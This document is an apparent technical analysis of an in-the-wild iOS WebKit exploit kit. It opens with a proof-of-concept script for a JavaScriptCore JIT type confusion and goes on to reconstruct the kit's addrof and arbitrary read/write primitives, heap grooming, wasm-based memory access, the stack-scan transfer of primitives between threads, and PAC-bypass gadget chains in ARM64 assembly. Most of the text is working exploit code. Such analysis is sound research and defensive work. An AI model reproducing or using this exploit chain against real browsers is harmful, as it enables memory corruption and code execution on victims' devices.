let floatArrWProp2 = [1.1, 2.2];
floatArrWProp2.prop = 1.1;
function newTarget() {}
let structS1 = Reflect.construct(Object, [], newTarget);
let structS3 = Reflect.construct(Object, [], newTarget);
//print("After creation"); print(describe(structS1)); print(describe(structS3));
// 42880/42880
structS1.p1 = floatArrWProp1;
structS1.p2 = floatArrWProp1;
structS3.p1 = 0x1337;
structS3.p2 = 0x1337;
//print("After p1/p2 assign"); print(describe(structS1)); print(describe(structS3));
// 43104/43104
delete structS3.p2;
// print("After structS3.p2 delete"); print(describe(structS1)); print(describe(structS3));
// 43104/43216
delete structS3.p1;
// print("After structS3.p1 delete"); print(describe(structS1)); print(describe(structS3));
// 43104/43328
structS3.p1 = 0x1337;
// print("After structS3.p1 assign"); print(describe(structS1)); print(describe(structS3));
// 43104/43440
structS3.p2 = 0x1337;
// print("After structS3.p2 assign"); print(describe(structS1)); print(describe(structS3));
// 43104/43552
let compilerSlowDownObj = {}; // {guard_p1: 1}; // {guard_p1: 1,p1: [1.1, 2.2]};
// arrays to do the confusion with
let i32Arr = new Uint32Array(2);
let f64Arr = new Float64Array(i32Arr.buffer);
function toJIT(useS3, skipEverything) {
// this is there so that the JIT will never see obj becoming struct type 2 (which could happen after the delete)
if (skipEverything) {return;}
let obj = structS1;
if (useS3) {
obj = structS3;
// JIT barrier - this can have side effects so the JIT has to forget type of obj
(0)[0]
}
// slow down compiler
let slowdownLoopCnt = 0;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
// the real exploit does this - I assume it forces a type check here instead of doing it later - but I can remove it and still crash
/*"uo" in obj;*/
let typeConfused = obj.p1; // JIT compiler assumes typeConfused to be an array of two floats
if (useS3) typeConfused = floatArrWProp2;
f64Arr[0] = typeConfused[1]; // because of the assumption above this is a simple store
i32Arr[0] = i32Arr[0] + 16;
typeConfused[1] = f64Arr[0]; // and this is a simple store as well
// slow down compiler again
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
}
// now they need to JIT this function
const jitIterTotal = 0x1000000;
const jitIterTrain = 0x20000;
for (let jitIterCnt = 0; jitIterCnt < jitIterTotal; jitIterCnt++) {
if (jitIterCnt > jitIterTrain) {
// forcing compilation
toJIT(false,true);
}else{
// training
toJIT(jitIterCnt % 2 && jitIterCnt < 256, jitIterCnt > 4096);
}
if (jitIterCnt == jitIterTrain) {
delete structS1.p2;
// print("After structS1.p2 delete"); print(describe(structS1)); print(describe(structS3));
// 43216 / 43552
}
}
// now the function is hopefully compiled wrong
for (let t = 0; t < 0x100000; t++) new Array(13.37, 13.37, 13.37, 13.37); // force GC (an assumption, because replacing this with a gc() call also works)
delete structS1.p1; // strip off the signature fully?
//print("After structS1.p1 delete"); print(describe(structS1)); print(describe(structS3));
// 43328 / 43552
structS1.p1 = fakeFloatArr;
// print("After structS1.p1 assign"); print(describe(structS1)); print(describe(structS3));
// 43440 / 43552
structS1.p2 = 1;
// print("After structS1.p2 assign"); print(describe(structS1)); print(describe(structS3));
// 43552 / 43552
// at this point structS1 has the same structure as structS3 again, so we can call the function without dropping into the slow path
toJIT(false,false); // if everything went OK, this will corrupt fakeFloatArr[1] to point to victimObj+0x10 instead of victimObj
// now force a crash
let converter32 = new Uint32Array(2);
let converterFloat = new Float64Array(converter32.buffer);
let i32objtofloat = function (t) {converter32[0] = t[0]; converter32[1] = t[1] - 0x20000; return converterFloat[0]}
victimObj.prop1 = i32objtofloat([201527, 16783110]); // valid JS obj header?
JSON.stringify(structS1) // just trigger the crash
and can be invoked via:
DYLD_FRAMEWORK_PATH=./272535@main/Release/ ./272535@main/Release/jsc poc.js
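The Uint32Array/Float64Array punning the PoC relies on (converter32/converterFloat, i32objtofloat) is worth isolating, because the kit uses it everywhere to move raw bit patterns between integers and doubles. A standalone sketch (all names here are mine, not the kit's):

```javascript
// Two typed arrays sharing one buffer: writing the halves as u32 and
// reading a f64 reinterprets the raw bits, and vice versa.
const u32 = new Uint32Array(2);
const f64 = new Float64Array(u32.buffer);

// hypothetical helpers mirroring the PoC's i32objtofloat/hdr2float idea
function pairToF64(lo, hi) {
  u32[0] = lo; // low 32 bits (little-endian)
  u32[1] = hi; // high 32 bits
  return f64[0];
}

function f64ToPair(x) {
  f64[0] = x;
  return [u32[0], u32[1]];
}
```

The pair round-trips losslessly as long as the bits don't form a NaN, which is why a fake header like [0x31337, 0x1001706] survives being smuggled through a float property.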
The cassowary module contains two functions: an exported one that performs a single exploitation attempt, and the main one that contains the actual exploit and all the relevant code for it. This bigger function contains:
The reason for the worker thread is likely to provide a clean execution environment for the exploit, making it more deterministic and allowing for easy retries by restarting the worker. After obtaining the R/W primitive in the worker, it is then transferred to the main thread by corrupting its stack (more details later), which is very slick and also doesn't add much complexity to the design, so I think their decision to use a worker thread is a solid one.
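Stripped of the Worker machinery, the restart-on-failure idea reduces to a simple pattern; this is my own sketch, with attemptFactory standing in for spawning a fresh worker:

```javascript
// Retry wrapper: each attempt runs in a fresh context; on failure we throw
// the context away and start over, which is what restarting a Worker buys.
function retryAttempts(attemptFactory, maxTries) {
  let lastErr;
  for (let i = 0; i < maxTries; i++) {
    try {
      return attemptFactory(i); // fresh "environment" per attempt
    } catch (e) {
      lastErr = e;              // tear down and retry
    }
  }
  throw lastErr;
}
```

The advantage of doing the equivalent with a real Worker is that a failed attempt cannot leave corrupted heap state behind for the next try.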
The inner exploit function contains helpers and five main functions which:
The misaligned pointer they get from the type confusion is now pointing to
From this the exploit will create an
In practice things aren't this easy, because the engine might perform checks and reject the fake float array; to work around this the exploit actually builds the
function jittedWriter(t, n) {
let r = exploit_module.gRWArray1[0];
f64_arrbuf7[0] = r[2];
f64_arrbuf7[1] = r[4];
f64_arrbuf7[2] = r[5];
f64_arrbuf7[3] = r[0];
f64_arrbuf7[4] = r[1];
r = exploit_module.gRWArray1[2];
r[t] = n
}
They copy 5 floats from
I assume the reason for using these indices is to keep the JIT from loading both
They JIT this function while both index 0 and index 2 contain the training object:
let training_obj_mbe = {p1: 1, p2: 1, length: 16};
Array.prototype.fill.call(training_obj_mbe, 1.1);
[...]
exploit_module.gRWArray1[0] = training_obj_mbe;
exploit_module.gRWArray1[2] = training_obj_mbe;
for (let t = 0; t < 0x100000; t++) jittedWriter(1, 1.1);
Then they create this
m.addrof = function(n) { // po
targetObj.b1 = n; // set object in butterfly
exploit_module.gRWArray1[2] = training_obj_mbe; // avoid side effects of obj 2 (the function is dual purpose)
jittedWriter(1, 1.1); // trigger
return f64_to_num(f64_arrbuf7[0]) // now they can read the float from the array and then convert it back to a number
};
This function operates on a specifically corrupted
exploit_module.gRWArray1[0] = exploit_module.type_confused_float_arr[1];
exploit_module.type_confused_float_arr[1] = null;
Where
The setup for the object we have a misaligned pointer to is the following:
var fakeHdr = exploit_module.hdr2float([0x31337, 0x1001706]); // m_indexingTypeAndMisc: 6 (NonArrayWithDouble) m_type: 23 (ObjectType) m_flags: 0, m_cellState: 1 (DefinitelyWhite)
exploit_module.flaky_obj.lo = fakeHdr;
exploit_module.flaky_obj.co = targetObj;
So to summarise: at this point they have
Sidenote:
The target object is surrounded by 256 objects below and another 256 objects above it. I think for this step the Eden GC from above is probably important as they need to guarantee that either
I don't fully understand the reason to spray another 256 objects after
exploit_module.tmpOptArr = [];
for (let t = 0; t < 256; t++) exploit_module.tmpOptArr[t] = {a1: 3.14, a2: 1.1};
let targetObj = {b1: exploit_module.ref2};
targetObj[0] = 1.1;
targetObj[1] = 1.1;
targetObj[2] = 1.1;
targetObj[3] = 1.1;
targetObj[4] = 1.1;
for (let t = 256; t < 512; t++) exploit_module.tmpOptArr[t] = {a1: 3.14, a2: 1.1};
// the two around the target seem to be important too
let obj_after_target = exploit_module.tmpOptArr[256]; // l
obj_after_target[0] = 1.1;
obj_after_target[1] = 1.1;
obj_after_target[2] = 1.1;
obj_after_target[3] = 1.1;
obj_after_target[4] = 1.1;
let obj_before_target = exploit_module.tmpOptArr[255]; // c
obj_before_target[0] = 1.1;
obj_before_target[1] = 1.1;
obj_before_target[2] = 1.1;
obj_before_target[3] = 1.1;
obj_before_target[4] = 1.1;
After that they gain R/W based on float64 arrays. This is done by initially getting a legitimate struct ID of an object and setting it on
Afterwards they use the
Then they use the relative OOB write primitive to corrupt the butterfly pointer of the adjacent object to
Finally they JIT two functions that overwrite the butterfly pointer of the float array to point to an arbitrary address and then read/write from it and afterwards reset it to the value of
The R/W functions are the following and get jitted in the following way:
function read_jit() {
let float_arr = rw_pair[0];
let float_arr_obj = rw_pair[1];
float_arr[2] = 3.3;
float_arr_obj[0] = f64_arrbuf7[0]; // addr to read from
useless[1] = 3.3;
f64_arrbuf7[0] = float_arr[0]; // value being read
float_arr_obj[0] = f64_arrbuf7[1]; // reset
return f64_arrbuf7[0] // return read value
}
for (let t = 0; t < 1048576; t++) {
useless = new Array(1, 2, 3);
read_jit(t + 3.3);
read_jit(t + .1)
}
function write_jit() {
let float_arr = rw_pair[0];
let float_arr_obj = rw_pair[1];
float_arr[2] = 3.3;
float_arr_obj[0] = f64_arrbuf7[0];
useless[1] = 3.3;
float_arr[0] = f64_arrbuf7[2];
float_arr_obj[0] = f64_arrbuf7[1]
}
for (let t = 0; t < 1048576; t++) {
useless = new Array(1, 2, 3);
write_jit(t + 3.3, 13.37);
write_jit(t + 3.3, 13.37)
}
I assume the reason for
Afterwards they upgrade their read primitive, presumably so that they can read all values, not just those that are valid floats. For that they abuse the fact that the length of a butterfly is stored inside the butterfly itself, so when they modify the butterfly pointer of an array and then access the
Initially they need to JIT the read function that fetches the length:
let read_abused_arr = new Array(4096).fill(13.37);
function jitted_read_abused_arr_len() {
return read_abused_arr.length
}
for (let t = 0; t < 0x100000; t++) jitted_read_abused_arr_len(t + .1);
Then they setup the read:
const read_abused_arr_addr = m.addrof(read_abused_arr);
const read_abused_arr_orig_backend_ptr = m.read(read_abused_arr_addr + 8);
m.stage2_read = function(t) { // Ys
m.write_v1(read_abused_arr_addr + 8, t + 8);
let i = jitted_read_abused_arr_len();
m.write_v1(read_abused_arr_addr + 8, read_abused_arr_orig_backend_ptr);
return i >>> 0
};
and also provide multiple versions of the read and write primitives reading different sizes and types.
Finally, they validate their primitives: they set values in an array, read them back with the read function, change them with the write function, and then read them again from JS.
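What the "multiple versions" of the primitives amount to is mostly bit-plumbing on top of the 32-bit length read. A runnable mock of that idea (a DataView stands in for the corrupted array; in the real exploit read32 would be the stage2_read above, and all names are mine):

```javascript
// Mock memory so the sketch runs standalone.
const mem = new DataView(new ArrayBuffer(0x100));
mem.setUint32(0x10, 0xdeadbeef, true);
mem.setUint32(0x14, 0x1337, true);

// In the exploit this is the butterfly-length read.
const read32 = (addr) => mem.getUint32(addr, true);

// Wider/narrower variants composed from the 32-bit primitive.
const read64 = (addr) =>
  (BigInt(read32(addr + 4)) << 32n) | BigInt(read32(addr));
const read16 = (addr) => read32(addr) & 0xffff;
const read8  = (addr) => read32(addr) & 0xff;
```

Write variants work the same way in reverse: mask the value, merge it into the surrounding 32-bit word, and write that back.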
At this point I would call R/W done, but they have an R/W class that they want to pass the primitives to. This class uses WebAssembly to do the actual reads and writes, so let's have a look at that next.
The wasm R/W class initialises two very simple wasm modules:
(module
(type (;0;) (func (result i64)))
(type (;1;) (func (param i64)))
(func (;0;) (type 0) (result i64)
global.get 1)
(func (;1;) (type 1) (param i64)
local.get 0
global.set 1)
(table (;0;) 1 externref)
(memory (;0;) 1)
(global (;0;) (mut v128) (v128.const i32x4 0x33333333 0x33333333 0x33333333 0x33333333))
(global (;1;) (mut i64) (i64.const -6067004223159161907))
(global (;2;) (mut v128) (v128.const i32x4 0x33333333 0x33333333 0x33333333 0x33333333))
(global (;3;) (mut externref) (ref.null extern))
(global (;4;) (mut externref) (ref.null extern))
(global (;5;) (mut externref) (ref.null extern))
(global (;6;) (mut externref) (ref.null extern))
(global (;7;) (mut externref) (ref.null extern))
(export "edfy" (global 1))
(export "memory" (memory 0))
(export "btl" (func 0))
(export "alt" (func 1)))
They define two functions
The R/W module then exports a lot of helper functions to read and write different sizes and types, as well as wrappers around the number class to make handling easier.
So far all of this has happened in the worker thread that was created for exploitation. In there the exploit now has full R/W, but the attacker somehow needs to transfer it to the main thread to continue exploitation there. For this the worker signals the main thread, which then invokes the following flow on the main thread:
const marker_array = JSON.parse(("[0.0, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9, 10.10]")); // the reason they do this is, I guess, to avoid having 5.5 as a raw number on the stack somewhere
const rw = new rw_module; // c
const com_arr_towards_worker = rw.arr_obj_num_num_prop;
marker_array[0] = rw.numConv.bigint_to_f64(0xdeadn);
marker_array[1] = -0;
com_arr_towards_worker[0] = rw.webasm_instance;
com_arr_towards_worker[1] = rw.wasm_instance2;
const take_primitives = () => {
const arr_to_find = [0x55432, com_arr_towards_worker, 0x55432, 0xFF432, marker_array, 0xFF432];
const recursive_func = (t, ...e) => {
try {
recursive_func(t + 1, ...arr_to_find, ...e)
} catch (t) {}
};
recursive_func(0, arr_to_find);
if (marker_array[5] !== 6.6) {
debug_log("");
try {
debug_log("");
rw.ws = rw.numConv.f64_to_bigint(marker_array[0]);
rw.ds = rw.numConv.f64_to_bigint(marker_array[1]);
rw.ys = rw.numConv.f64_to_bigint(marker_array[2]);
rw.As = rw.numConv.f64_to_bigint(marker_array[3]);
rw.arr_obj_num_num_prop_addr = rw.numConv.f64_to_bigint(marker_array[4]);
fingerprint_module.device_properties.rw = rw; // Xn
t()
} catch (t) {
debug_log(t)
}
} else window.setTimeout(take_primitives, 0)
};
The code will now, in a loop, push the recursive function with its arguments onto the stack until
for (let offset = -0x1800n; offset > -0x3000n; offset -= 0x8n) {
const addr2check = stack_base - offset;
// check if we have the marker
if (_rw.read64(addr2check) == 0xfffe000000055432n &&
_rw.read64(addr2check + 0x8n * 2n) == 0xfffe000000055432n &&
_rw.read64(addr2check + 0x8n * 3n) == 0xfffe0000000ff432n &&
_rw.read64(addr2check + 0x8n * 5n) == 0xfffe0000000ff432n) {
and once it finds the array named
const com_arr_towards_worker = _rw.read64(addr2check + 0x8n * 1n);
const com_arr_towards_worker_butterfly = _rw.read64(com_arr_towards_worker + 0x8n);
const marker_array = _rw.read64(addr2check + 0x8n * 4n);
const marker_array_butterfly = _rw.read64(marker_array + 0x8n);
const wasm_i1 = _rw.read64(com_arr_towards_worker_butterfly);
const wasm_i1_cpp = _rw.read64(wasm_i1 + toBigInt(offsets[webasm_js_to_cpp_instance]));
const wasm_i1_cpp_globals = wasm_i1_cpp + toBigInt(offsets[webasm_cpp_instance_global_0_off]);
const wasm_i2 = _rw.read64(com_arr_towards_worker_butterfly + 0x8n);
const wasm_i2_cpp = _rw.read64(wasm_i2 + toBigInt(offsets[webasm_js_to_cpp_instance]));
const wasm_i2_cpp_globals = wasm_i2_cpp + toBigInt(offsets[webasm_cpp_instance_global_0_off]);
_rw.w64_wrapper(wasm_i2_cpp + toBigInt(offsets[wasm_cpp_gc_mark]), 0x8000000000000000n);
_rw.w64_wrapper(wasm_i1_cpp + toBigInt(offsets[wasm_cpp_gc_mark]), 0x8000000000000000n);
_rw.w64_wrapper(wasm_i1_cpp_globals, wasm_i2_cpp_globals);
_rw.w64_wrapper(marker_array_butterfly + 0x0n, wasm_i2_cpp);
_rw.w64_wrapper(marker_array_butterfly + 0x8n, wasm_i2_cpp_globals);
_rw.w64_wrapper(marker_array_butterfly + 0x10n, wasm_i1_cpp);
_rw.w64_wrapper(marker_array_butterfly + 0x18n, wasm_i1_cpp_globals);
_rw.w64_wrapper(marker_array_butterfly + 0x20n, com_arr_towards_worker);
_rw.w64_wrapper(marker_array_butterfly + 0x28n, 0x0n);
And with this they finally have R/W on the main thread, what a ride!
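The net effect of the corruption above can be mocked in plain JS: rebasing one instance's globals pointer turns its tiny get/set exports into read/write on whatever the base points at. Everything below is my own naming and a pure mock, not the kit's code:

```javascript
// 'mem' plays the WebContent address space; 'globalsBase' plays the C++
// instance's global-0 pointer that the exploit overwrites.
class MockWasmInstance {
  constructor(mem) { this.mem = mem; this.globalsBase = 0; }
  btl()  { return this.mem.getBigUint64(this.globalsBase, true); } // global.get
  alt(v) { this.mem.setBigUint64(this.globalsBase, v, true); }     // global.set
}

const mem = new DataView(new ArrayBuffer(0x100));
const inst = new MockWasmInstance(mem);
inst.globalsBase = 0x40;       // the overwritten globals pointer
inst.alt(0x4141414141414141n); // now an arbitrary 64-bit write
```

In the real exploit the pointer swap is done once from the worker (the w64_wrapper writes above), after which the main thread only ever calls the exported wasm functions.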
Their next high-level goal is to execute native code inside the WebContent process to run their LPE. Before they can load and link a dylib, however, they first need a function calling primitive, and on newer devices that requires a PAC bypass, so let's have a look at how they achieve this next.
In this section we will have a look at the PAC bypass (
Once the exploit has gained R/W, code execution returns to the main module. This will now do PAC detection by getting a function pointer from both a
In this capture, PAC is detected, which means they now need to acquire a signer.
This is done by selecting a PAC bypass (for this capture against iOS 17.1, that is
For
Because the original
The main PAC bypass module then has 11 classes; they can roughly be divided into
I think it makes sense to explain the PAC bypass module in order of primitives acquired, so let's start with the caller:
For this they create an
Specifically they:
For this they need a couple of memory buffers and at this stage they get them by creating an array buffer and then operating on its backend storage.
At this point they have a PACIZA calling primitive with x1 fully controlled. Based on this they gain two more primitives: one allows calls with arbitrary x0, x1 and x2, and the other calls arbitrary PACIZA pointers with arbitrary x0, x1, x2 and x3, with the restriction that x0 and x1 hold the same value. In both new primitives they also obtain the return value of the call by storing it to memory and reading it back afterwards.
For the former the following call chain is used:
_autohinter_iterator_end:
c10000b4 cbz x1, 0x18
221040f9 ldr x2, [x1, 0x20] - enet_allocate_packet_payload_default
820000b4 cbz x2, 0x18
200440f9 ldr x0, [x1, 8] - buf5_80
211840f9 ldr x1, [x1, 0x30] - buf4_768
5f081fd6 braaz x2
c0035fd6 ret
enet_allocate_packet_payload_default:
7f2303d5 pacibsp
f44fbea9 stp x20, x19, [sp, -0x20]!
fd7b01a9 stp x29, x30, [sp, 0x10]
fd430091 add x29, sp, 0x10
f30300aa mov x19, x0
48100fb0 adrp x8, 0x1e209000
086d41f9 ldr x8, [x8, 0x2d8]
e00301aa mov x0, x1 - buf4_768
1f093fd6 blraaz x8 - _HTTPConnectionFinalize
f40300aa mov x20, x0
800000b5 cbnz x0, 0x38
48100fb0 adrp x8, 0x1e209000
087541f9 ldr x8, [x8, 0x2e8]
1f093fd6 blraaz x8 - xmlSAX2GetPublicId_ref
740a00f9 str x20, [x19, 0x10] - stores to buf5_80+0x10
fd7b41a9 ldp x29, x30, [sp, 0x10]
f44fc2a8 ldp x20, x19, [sp], 0x20
ff0f5fd6 retab
_HTTPConnectionFinalize: // there are some CFRelease calls etc in there as well that are skipped because the ptrs are null (omitted for readability)
PACIBSP
STP X20, X19, [SP,#-0x10+var_10]!
STP X29, X30, [SP,#0x10+var_s0]
ADD X29, SP, #0x10
MOV X19, X0
LDR X8, [X0,#0x40]
CBZ X8, loc_192E60A8C
LDR X1, [X19,#0x28]
MOV X0, X19
BLRAAZ X8
LDR X0, [X19,#0x138] ; cf
CBNZ X0, loc_192E60AD0
LDR X8, [X19,#0x158]
CBZ X8, loc_192E60AF4
LDR X0, [X19,#0x148]
BLRAAZ X8
; CODE XREF: __HTTPConnectionFinalize+84↑j
LDR X8, [X19,#0x178] - _autohinter_iterator_begin_paciza
LDR W0, [X19,#0x88] ; int
CBZ X8, loc_192E60B20
LDP X1, X2, [X19,#0x180] - x1/buf1_80
LDR X3, [X19,#0x190] - 0x1CCCCCCC
BLRAAZ X8
; CODE XREF: __HTTPConnectionFinalize+C4↓j
; __HTTPConnectionFinalize+D0↓j ...
MOV W8, #0xFFFFFFFF
STR W8, [X19,#0x88]
; CODE XREF: __HTTPConnectionFinalize:loc_192E60B20↓j
LDP X29, X30, [SP,#0x10+var_s0]
LDP X20, X19, [SP+0x10+var_10],#0x20
RETAB
_autohinter_iterator_begin:
c20000b4 cbz x2, 0x18
430840f9 ldr x3, [x2, 0x10] - dict.ab
830000b4 cbz x3, 0x18
400440f9 ldr x0, [x2, 8] - dict.sb
421840f9 ldr x2, [x2, 0x30] - dict.x2
7f081fd6 braaz x3
c0035fd6 ret
And for the latter they invoke the following call chain:
_autohinter_iterator_end:
c10000b4 cbz x1, 0x18
221040f9 ldr x2, [x1, 0x20] - _HTTPConnectionFinalize_paciza
820000b4 cbz x2, 0x18
200440f9 ldr x0, [x1, 8] - buf2_544
211840f9 ldr x1, [x1, 0x30] - 0
5f081fd6 braaz x2
c0035fd6 ret
_HTTPConnectionFinalize: // there are some CFRelease calls etc in there as well that are skipped because the ptrs are null (omitted for readability)
PACIBSP
STP X20, X19, [SP,#-0x10+var_10]!
STP X29, X30, [SP,#0x10+var_s0]
ADD X29, SP, #0x10
MOV X19, X0
LDR X8, [X0,#0x40]
CBZ X8, loc_192E60A8C
LDR X1, [X19,#0x28]
MOV X0, X19
BLRAAZ X8
LDR X0, [X19,#0x138] ; cf
CBNZ X0, loc_192E60AD0
LDR X8, [X19,#0x158]
CBZ X8, loc_192E60AF4
LDR X0, [X19,#0x148]
BLRAAZ X8
